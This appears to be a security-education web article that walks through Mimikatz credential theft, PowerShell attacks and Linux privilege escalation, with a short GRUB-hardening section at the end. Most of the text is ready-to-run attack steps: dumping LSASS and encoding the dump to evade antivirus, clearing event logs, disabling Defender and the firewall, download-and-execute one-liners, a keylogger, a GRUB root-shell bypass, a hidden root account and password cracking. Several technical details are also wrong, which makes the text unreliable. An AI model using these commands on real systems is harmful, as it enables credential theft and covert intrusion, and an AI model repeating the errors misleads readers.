Understanding Mimikatz, PowerShell Exploits, and Linux Privilege Escalation

Cybersecurity professionals and penetration testers often use tools and techniques to assess vulnerabilities in systems. Among the most well-known tools is Mimikatz, a powerful post-exploitation tool for extracting credentials from Windows machines. Additionally, PowerShell can serve as both a powerful automation tool and a potential attack vector, while Linux privilege escalation techniques enable attackers to gain root access. This article explores these topics in detail.

Mimikatz: Extracting Credentials and Privilege Escalation

Mimikatz is a tool used to extract passwords, hashes, PINs, and Kerberos tickets from memory. It allows attackers and security researchers to exploit vulnerabilities in Windows authentication mechanisms.

Key Mimikatz Commands

Privilege::debug – Enables debug mode, necessary for many other Mimikatz operations.
Serkurlsa:logon – Retrieves login session information.
Log logfile.txt – Logs all commands into a file.
Token::whoami – Displays user permissions.
Token::elevate – Attempts to escalate privileges.
Lsadump::sam – Extracts credentials from the Local Security Authority Subsystem Service (LSASS).
Serkurlsa::logonpasswords – Retrieves credentials of all active (logged-in) users. Adding ‘full’ will retrieve all passwords on the system.
Event::drop – Patches event logging. This is done so upon clearing the event logs with the following command no entry will remain documenting the actual clearing action.
Event::clear – Clears all system logs (i.e., deletes them).

Bypassing Endpoint Protection

Modern endpoint protection solutions, such as advanced antivirus and Data Loss Prevention (DLP) systems, can detect and block Mimikatz. However, attackers often use obfuscation techniques or execute the tool in memory to avoid detection.

Creating and Extracting Dump Files

Creating a dump file:

Open the task manager by pressing Win + R and typing taskmgr.msc.
Under the Processes tab, navigate to the Local Security Authority process → Right-click → Select Create Dump File.

A process is a compiled software that runs in the background in real-time.

Extract it using PowerShell:

certutil.exe –encode .\lsass.DMP 1

This will encode the file, enabling the user to exfiltrate the file to an external system without being detected and blocked by the AV.

PowerShell as a Cybersecurity Weapon

PowerShell is a Microsoft tool that enhances Command Prompt (CMD) automation capabilities, allowing administrators to make scripts and manage systems efficiently. However, its scripting capabilities make it a popular choice for attackers.

Using PowerShell for Exploitation

Executing Scripts with Elevated Privileges

By default, PowerShell restricts script execution. To override this restriction, an attacker can use:

Set-ExecutionPolicy Unrestricted

Alternatively, PowerShell scripts can be executed by bypassing security settings via:

Powershell –ExecutionPolicy Bypass

Disabling Windows Security Features

Disabling the firewall:

netsh advfirewall set allprofiles state off

Disabling Windows Defender:

Set-MpPreference –DisableRealtimeMonitoring $true

(To re-enable, replace $true with $false$ .)

Downloading and Executing Scripts

Attackers often download files via PowerShell to evade traditional browser security.

Old version:

(New-Object Net.Webclient).downloadfile(‘URL’,’Local file name to save as’)

Modern option:

Invoke-WebRequest –Uri "https://pastebin.com/raw/example" –OutFile "C:\Users\Desktop\Malicious.ps1"

To execute Mimikatz directly from memory:

IEX(New-Object Net.Webclient).DownloadString("Link")
Invoke-Mimikatz

PowerSploit and PowerShell Modules for Exploitation

PowerSploit is a PowerShell penetration testing framework containing scripts for privilege escalation, keylogging, and network scanning.

Importing the PowerSploit module:

Import-Module ./powersploit.psd1

Enumerating user tokens:

Invoke-TokenManipulation –Enumerate

Running a keylogger:

Get-KeyStrokes –LogPath ‘C:\Users\Desktop\Keylogger.txt’

Injecting a DLL into a process:

Invoke-DllInjection –ProcessID <ID> -DLL <dll file>

Scanning a host’s ports:

Invoke-PortScan –Hosts "IP"

Almost every tool available in Kali Linux has an equivalent in PowerShell. There are PowerShell modules like Nishang, PowerCat, PowerPassploit, and MAFIA, which offer a large set of exploitation tools. For more information, visit: www.powershellgallery.com

Linux Local Privilege Escalation

Linux systems use structured permission models similar to Windows, but they can still be exploited if improperly configured.

Understanding User Roles in Linux

Regular User – Has basic permissions and is managed by an administrator.
Root User – Has full system control and can modify system files.
Sudoers Group – A group of privileged users allowed to execute administrative commands.

Linux File Permissions

Linux permissions are structured as follows:

r (read)
w (write)
x (execute)

Permission Numerical Values: 0 → No permissions 1 → Execute 2 → Write 4 → Read

To modify file permissions:

chmod +x <file>     # Add execute permission
chmod -g +x <file>  # Add execute permission for the group

Linux Boot Process and Security Bypasses

BIOS – Initializes system hardware. The first thing that runs, stored on a chip which defines hardware settings.
MBR – Manages the system’s partitions.
GRUB – The bootloader. Initializes system files.
Kernel – Loads drivers and manages system processes and core system settings.
INIT – The first process to run in Linux.
Run Level – The stage where all system processes execute.

Local privilege escalation refers to a physical attack which necessitates physical access to the device. This allows attackers to access and manipulate the GRUB to gain root access. Modifying GRUB boot parameters will allow users to bypass login security.

The process is as follows:

The attacker would turn on the computer/reboot the system and wait for the GRUB boot loader menu to appear.
Once loaded, they’d quickly press the ’e’ key before the OS automatically boots (‘e’ for ‘edit’).
In the editing GRUB menu, locate the line containing ro single initrd="..." and change it to rw single init="/bin/bash". This will open up a root shell.

Once inside a root shell, an attacker can type:

passwd          # To change the root password
useradd –ou 0 –g 0 hacker   # To create a new root user
reboot -f      # To force system reboot

Extracting and Cracking Linux Passwords

Linux stores password hashes in /etc/shadow. Attackers can extract these hashes and crack them using John the Ripper. This requires read access to both the /etc/passwd and /etc/shadow files. With such permissions, a hacker can type:

unshadow /etc/passwd /etc/shadow > hashfile

which produces a file containing the password hashes. To crack said file, type:

john hashfile

(This instructs John The Ripper to attempt and crack the hashes within the file.)

Securing Linux Systems Against Privilege Escalation

To protect against unauthorized access:

Restrict user privileges – Avoid granting unnecessary sudo permissions.
Encrypt GRUB – Prevent boot parameter modifications (the attack described previously).

Commands:

grub-mkpasswd-pbkdf2

This produces a hashed password for GRUB encryption. Afterwards, add this generated hash to /etc/grub.d/00_header:

nano /etc/grub.d/00_header

(Using the nano text editor, scroll to the very bottom of the file and add the following lines:)

set superusers="root"
password_pbkdf2 root <hash>

Also, add the same lines to the following files:

/etc/grub.d/10_linux
/etc/grub.d/30_os-prober
/etc/grub.d/40_custom

Finally, apply the changes and reboot:

sudo update-grub
reboot

If the steps were followed correctly, you should now be prompted for a password to decrypt and access GRUB in order to boot the OS.

← Back to Articles

Basic Cybersecurity Attacks